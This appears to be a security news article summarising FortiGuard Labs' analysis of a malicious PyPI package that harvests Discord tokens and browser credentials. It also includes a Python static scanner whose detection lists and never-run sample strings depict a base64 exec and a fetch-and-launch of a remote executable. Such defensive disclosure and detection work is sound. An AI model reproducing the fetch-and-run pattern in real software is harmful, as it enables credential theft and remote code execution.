PyPI Package Malware Targets Discord Users for Credential Theft

Hackers frequently abuse PyPI packages, injecting malicious code into widely used Python libraries and probing for weaknesses to exploit.

Recently, FortiGuard Labs cybersecurity researchers uncovered a malicious PyPI package, “discordpy_bypass-1.7,” targeting Discord users for credential theft. It was published on March 10, 2024, and detected on March 12, 2024.

Authored by Theaos, the package comes in seven versions with nearly identical traits and aims to obtain sensitive information from victims through persistence techniques, browser data extraction, and token harvesting.

PyPI Package Malware

The discordpy_bypass-1.7 PyPI package carries out persistent attacks, with malicious behavior aimed at extracting sensitive data from user systems. It uses code obfuscation and evasion techniques to avoid analysis environments.

The code incorporates various checks to detect and terminate itself when running in a debug or analysis environment, indicating efforts to evade detection.

The code uses three layers of obfuscation: base64 encoding of the original Python code, a further encoding layer using obfuscation techniques, and compilation into an executable that discordpy_bypass/discordpy_bypass.py fetches from a remote URL.
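As an added example (not taken from FortiGuard's report or from the package), the following static triage sketch parses a package's Python source without executing it and flags two of the traits described above: dynamic execution of a decoded payload, and a script that fetches a remote executable and can launch it. The call-name lists, finding labels, and sample strings are assumptions chosen for illustration, and the heuristic only catches a decoder nested directly inside `exec`/`eval`.

```python
import ast

# Heuristic call names (assumed lists, not indicators published for this package).
DECODERS = {"b64decode", "b32decode", "a85decode", "unhexlify", "decompress"}
DYNAMIC_EXEC = {"exec", "eval"}
DOWNLOADERS = {"urlretrieve", "urlopen", "get"}
LAUNCHERS = {"Popen", "run", "call", "system", "startfile"}

def call_name(call):
    """Rightmost name of a call target, e.g. base64.b64decode -> 'b64decode'."""
    func = call.func
    return func.attr if isinstance(func, ast.Attribute) else getattr(func, "id", "")

def is_exe_url(node):
    """True for a string literal holding an http(s) URL whose path ends in .exe."""
    url = node.value.lower() if isinstance(node, ast.Constant) and isinstance(node.value, str) else ""
    return url.startswith(("http://", "https://")) and url.split("?")[0].endswith(".exe")

def scan_source(source, filename="<package>"):
    """Parse (never execute) one file; return sorted (line, finding), line 0 = file-level."""
    findings, has_launcher = set(), False
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = call_name(node)
        nested = {call_name(n) for arg in node.args
                  for n in ast.walk(arg) if isinstance(n, ast.Call)}
        if name in DYNAMIC_EXEC and nested & DECODERS:
            findings.add((node.lineno, "exec-of-decoded-payload"))
        if name in DOWNLOADERS and any(is_exe_url(a) for a in node.args):
            findings.add((node.lineno, "remote-executable-fetch"))
        has_launcher = has_launcher or name in LAUNCHERS
    if has_launcher and any(f == "remote-executable-fetch" for _, f in findings):
        findings.add((0, "fetch-and-launch-in-same-file"))
    return sorted(findings)

# Constructed samples (parsed only, never run); the URLs are placeholders.
SUSPICIOUS = '''import base64, subprocess, urllib.request
exec(base64.b64decode("cHJpbnQoMSk="))
urllib.request.urlretrieve("https://example.invalid/update.exe", "u.exe")
subprocess.Popen("u.exe")
'''
BENIGN = '''import base64, requests
data = base64.b64decode("aGVsbG8=")
page = requests.get("https://example.invalid/index.html")
'''

if __name__ == "__main__":
    print(scan_source(SUSPICIOUS), scan_source(BENIGN))
```

Run it over the unpacked sdist or wheel contents before installation; a hit is a reason for manual review, not a verdict.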

The code also includes debugging environment detection techniques, such as checking for blacklisted processes and comparing system IP/MAC addresses against blocklists.

It’s crucial for users to remain vigilant and proactive against such threats from the outset.

FortiGuard noted that to detect debugging environments, the code promptly verifies the system username, hostname, and hardware ID against blocklists.

After initializing its variables, the code sets up Socket.IO events for remote control and monitoring, which enable actions such as file operations, directory navigation, and command execution.

Authentication tokens, particularly those from Discord, are prime targets, and the code also harvests sensitive browser data, including login credentials, cookies, and web history.

The discordpy_bypass-1.7 code encrypts and validates any extracted tokens before uploading them to a remote server. This sophisticated threat operates stealthily, using evasive measures to avoid detection and analysis.

Awareness of such threats underscores the importance of remaining vigilant and implementing robust security measures. By understanding these risks, researchers can develop more secure systems, improving the protection of personal information and overall user safety through collective vigilance and collaboration.

About the Author:

FirstHackersNews- Identifies Security